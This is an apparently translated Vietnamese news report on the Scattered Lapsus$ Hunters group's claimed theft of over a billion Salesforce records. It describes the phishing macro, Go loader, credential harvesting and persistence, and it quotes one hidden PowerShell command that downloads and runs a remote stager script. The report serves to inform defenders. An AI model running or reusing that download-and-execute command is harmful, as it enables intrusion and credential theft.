Những kẻ săn lùng Lapsus$ rải rác tuyên bố đã đánh cắp hơn 1 tỷ hồ sơ Salesforce
Scattered Lapsus$ Hunters, một nhóm đe dọa trước đây có liên quan đến các vụ trộm dữ liệu nghiêm trọng, gần đây đã nhận trách nhiệm đánh cắp hơn một tỷ bản ghi từ môi trường Salesforce trên toàn thế giới.
Xuất hiện vào giữa năm 2025, nhóm này đã hoàn thiện chiến thuật của mình để khai thác các cấu hình sai trong danh tính đám mây và API bị lộ.
Các báo cáo ban đầu xuất hiện khi nhiều khách hàng của Salesforce nhận thấy các truy vấn bất thường đối với phiên bản quản lý quan hệ khách hàng (CRM) của họ vào đêm khuya, cho thấy sự hiện diện của một công cụ trích xuất tự động.
Khi các bản ghi pháp y được tích lũy, các nhà điều tra nhận ra rằng khối lượng và phạm vi dữ liệu được truy cập vượt xa các cuộc xâm nhập trước đó.
Trong chiến dịch mới nhất này , kẻ tấn công đã kết hợp giữa các chiêu trò lừa đảo có mục tiêu và đánh cắp thông tin đăng nhập để giành được chỗ đứng ban đầu.
.webp)
Trang web rò rỉ dữ liệu Salesforce của Bling Libra (Nguồn – Palo Alto Networks)
Các nạn nhân cho biết họ nhận được email có vẻ ngoài giống thật yêu cầu cập nhật bảo mật bắt buộc, nhưng trong đó lại phát tán một macro Office độc hại.
Sau khi thực thi, macro sẽ liên lạc với máy chủ chỉ huy và điều khiển từ xa để cài đặt trình tải nhẹ.
Các nhà phân tích của Palo Alto Networks lưu ý rằng trình tải này được viết bằng Go và biên dịch bằng các ký hiệu bị loại bỏ, khiến cho việc thực hiện kỹ thuật đảo ngược trở nên khó khăn hơn.
Sau đó, trình tải xác thực mã thông báo API và khởi tạo quy trình thu thập dữ liệu nhiều giai đoạn.
Tác động của vụ vi phạm này không chỉ giới hạn ở dữ liệu cá nhân bị lộ; các chiến lược bán hàng độc quyền, dự báo về quy trình bán hàng và các cuộc đàm phán nhạy cảm với khách hàng đều bị đe dọa.
Nhiều tổ chức phụ thuộc rất nhiều vào Salesforce cho các hoạt động quan trọng, nghĩa là bất kỳ sự thỏa hiệp nào cũng có thể dẫn đến gián đoạn hoạt động và tổn hại đến danh tiếng.
Những ước tính ban đầu cho thấy nhóm này có thể đã trích xuất dữ liệu với tốc độ liên tục trên 500 gigabyte mỗi giờ, đánh cắp hồ sơ theo từng đợt thông qua các kênh được mã hóa để tránh bị phát hiện.
Cơ chế lây nhiễm
Khi xem xét kỹ hơn cơ chế lây nhiễm, ta thấy sự nhấn mạnh mang tính chiến lược vào khả năng ẩn núp và dai dẳng.
Sau khi trình thả macro ban đầu thực thi, trình dàn dựng tập lệnh PowerShell sẽ được khởi chạy thông qua một dòng lệnh như sau:
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"
Trình dàn dựng này sẽ kiểm tra các chỉ báo hộp cát trước khi truy xuất toàn bộ trình tải dựa trên Go. Sau đó, trình tải sẽ giải mã thông tin đăng nhập được lưu trữ trong Windows Credential Manager bằng CredReadAPI và xác thực với Salesforce REST API bằng tài khoản dịch vụ có đặc quyền thấp nhất đáp ứng các yêu cầu truy cập dữ liệu.
Sau khi được xác thực, phần mềm độc hại sẽ liệt kê các lược đồ đối tượng và xây dựng động các truy vấn SOQL để truy xuất và xử lý hàng loạt bản ghi. Mỗi hàng loạt được lưu vào bộ nhớ đệm và mã hóa bằng ChaCha20 trước khi được truyền qua HTTPS đến điểm cuối trích xuất dữ liệu chuyên dụng.
Để đảm bảo tính bền bỉ, phần mềm độc hại sẽ đăng ký một tác vụ được lên lịch có tên, UpdaterSvckích hoạt sau mỗi hai giờ. Tác vụ này xác thực sự hiện diện của tệp nhị phân trình tải, tải lại nếu có thay đổi và tiếp tục trích xuất từ ID bản ghi thành công gần nhất.
Cách tiếp cận tỉ mỉ của nhóm đối với việc trốn tránh giới hạn tỷ lệ API và thu thập thông tin xác thực nhấn mạnh sự hiểu biết sâu sắc về môi trường đám mây gốc.
Bằng cách kết hợp kỹ thuật xã hội tinh vi, công cụ tùy chỉnh và chiến thuật kiên trì bền bỉ , Scattered Lapsus$ Hunters đã chứng minh khả năng đáng gờm trong việc xâm phạm các phiên bản Salesforce của doanh nghiệp ở quy mô lớn.
Theo : Cyber Security News
